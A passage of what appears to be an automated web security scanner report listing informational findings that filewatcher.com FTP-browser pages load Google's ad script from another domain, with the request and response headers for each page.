src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.962. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/packages/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "aaGPCe0Hf3zTPk2Tqh9NCw"
Content-Length: 8316
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 693
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.963. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JEfMtOzbH/z73MmA5P597Q"
Content-Length: 5350
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 693
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.964. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wLou2Zn26WwDoxiTfdkDJg"
Content-Length: 5540
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 694
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.965. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cF/4gxUGVKsGrUeZZHTpUA"
Content-Length: 25784
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 695
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.966. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/Latest.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/Latest.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/Latest.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "n+Y5QtQeCdkFslaHODbxcw"
Content-Length: 19334
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 699
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.967. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/news.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages/FreeBSD/ports/i386/packages-4.2-release/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0lELiKYMqm4ihDYxtpKWuQ"
Content-Length: 19090
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 699
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/FreeBS
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.968. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wh2.tu-dresden.de.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:34 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "P4XRE8QvSUJuUt13uQy2Bw"
Content-Length: 5271
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 747
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.969. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wh2.tu-dresden.de/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xhe+JP/x1ICxINj+UiZt+g"
Content-Length: 5632
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 747
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.970. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tO6zK27Wu6U4dqXxOc+Krg"
Content-Length: 15658
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 749
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.971. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "DfwLl1HG/e7OBkEfrgUYSw"
Content-Length: 8503
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 756
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.972. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xv5lRcKZsLoHCmxaAQKdOg"
Content-Length: 15052
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 758
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.973. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fIATpAtsxtCv9F+vPgUH3g"
Content-Length: 9950
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 757
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.974. http://www.filewatcher.com/b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages/i386.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wh2.tu-dresden.de/pub/mirrors/openbsd/4.5/packages/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZCXt19xeV8mXaOXjSjB+iA"
Content-Length: 20292
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 758
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wh2.tu-dresden.de/pub/mirror
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.975. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "cBMN+6S4NvanP6qAYq13jQ"
Content-Length: 7484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 722
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/ - FTP Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.976. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fVihhnoYb7vPhk1xHB4J+g"
Content-Length: 15712
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 724
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.977. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at/pub/systems.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Ny0WyoopoOVAy6pZQKPZ7g"
Content-Length: 9647
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 723
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.978. http://www.filewatcher.com/b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.wu-wien.ac.at/pub/systems/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:29 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "eeGpw5qbvrjLECItJelRBQ"
Content-Length: 10580
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 723
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.wu-wien.ac.at/pub/systems/Op
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

